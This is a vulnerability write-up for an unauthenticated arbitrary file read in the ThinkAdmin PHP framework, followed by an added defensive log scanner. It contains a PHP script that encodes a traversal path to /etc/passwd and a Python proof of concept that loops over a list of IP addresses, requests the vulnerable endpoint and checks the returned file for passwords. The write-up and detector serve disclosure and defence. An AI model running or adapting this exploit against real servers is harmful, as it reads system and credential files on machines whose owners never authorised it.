ThinkAdmin overview
ThinkAdmin is a backend management framework built on the latest ThinkPHP V6 and released under the permissive MIT license. The project depends on the home-grown component ThinkLibrary v6, which wraps a large number of common operations so that ordinary CRUD applications can be developed quickly without interfering with the original ThinkPHP ecosystem; the framework is well suited to rapid secondary development. Project address: https://github.com/zoujingli/ThinkAdmin
Vulnerability cause
app/admin/controller/api/Update.php can be accessed without authentication. When a user constructs a filename that satisfies the controller's encoding rules, arbitrary file read is possible.
Affected versions
ThinkAdmin versions ≤ 2020.08.03.01
Reproduction
Use a PHP script to generate an encoded filename that satisfies the rules.
<?php
function encode($content) {
    // encode a normal file name: convert to GBK first, then encode byte by byte
    list($chars, $length) = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
    // encode a Chinese file name (GB2312 variant)
    //list($chars, $length) = ['', strlen($string = iconv('UTF-8', 'GB2312', $content))];
    // each byte becomes two base-36 digits, left-padded with 0
    for ($i = 0; $i < $length; $i++)
        $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
    return $chars;
}
$content = "../../../etc/passwd";
echo encode($content);
?>
Request Update.php with the constructed parameter; if the response returns the base64-encoded file content, the vulnerability is present.
PoC
import requests
import json
import base64

requests.packages.urllib3.disable_warnings()

heard = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763",
    "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding" : "gzip, deflate",
    "Connection" : "close",
    "Upgrade-Insecure-Requests" : "1"
}

# one host per line in ip.txt
res = open("ip.txt", "r")
for ip in res.readlines():
    # the encode/ segment is a base-36 encoded path produced by the PHP script above
    url = "http://" + ip.strip() + "/admin/login.html?s=admin/api.Update/get/encode/1b2r33322u2x2v1b2s2p382p2q2p372t1a342w34"
    try:
        request = requests.get(url=url, headers=heard, verify=False, timeout=3)
        try:
            # the endpoint returns the file content base64-encoded in data.content
            rep = base64.b64decode(json.loads(request.text)['data']['content'])
            if "password" in str(rep):
                print("[+]" + ip.strip() + "存在任意文件读取漏洞")
            else:
                print("[-]" + ip.strip() + "不存在任意文件读取漏洞")
        except:
            pass
    except:
        pass
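As an added defensive example (not code from the original writeup or from ThinkAdmin), the following Python decodes the `encode` segment of logged requests to api.Update/get, reversing the two-base-36-digits-per-GBK-byte scheme shown above, and flags decoded paths that contain a `..` segment or start at the filesystem root. The log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from a real server). The first encode value is the
# one used in the PoC above; the second is the encoding of "../../../etc/passwd".
SAMPLE_LOG = """\
10.0.0.5 - - [03/Aug/2020:10:01:02 +0000] "GET /admin/login.html?s=admin/api.Update/get/encode/1b2r33322u2x2v1b2s2p382p2q2p372t1a342w34 HTTP/1.1" 200 512
10.0.0.7 - - [03/Aug/2020:10:01:03 +0000] "GET /admin/login.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 200 1843
10.0.0.9 - - [03/Aug/2020:10:01:04 +0000] "GET /admin/login.html HTTP/1.1" 200 9001
"""

ENCODE_RE = re.compile(r"api\.Update/get/encode/([0-9a-zA-Z]+)")


def decode_filename(chars: str) -> str:
    """Reverse ThinkAdmin's scheme: each GBK byte was written as two base-36 digits."""
    if len(chars) % 2:
        raise ValueError("encode parameter must have even length")
    # bytes() raises ValueError if a digit pair exceeds 255, i.e. the value is malformed
    raw = bytes(int(chars[i:i + 2], 36) for i in range(0, len(chars), 2))
    return raw.decode("gbk", errors="replace")


def is_traversal(path: str) -> bool:
    """A '..' segment or an absolute path should never appear in an update-file request."""
    segments = re.split(r"[\\/]+", path)
    return ".." in segments or path.startswith(("/", "\\"))


def scan_log(text: str) -> list:
    """Return (client_ip, decoded_path, suspicious) for every api.Update/get request."""
    findings = []
    for line in text.splitlines():
        match = ENCODE_RE.search(unquote(line))
        if not match:
            continue
        try:
            decoded = decode_filename(match.group(1))
        except ValueError:
            decoded = "<undecodable>"
        ip = line.split(" ", 1)[0]
        findings.append((ip, decoded, is_traversal(decoded)))
    return findings


if __name__ == "__main__":
    for ip, path, suspicious in scan_log(SAMPLE_LOG):
        print(f"{'ALERT' if suspicious else 'ok   '} {ip} -> {path!r}")
```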
Fix
Download the latest version of the ThinkAdmin framework.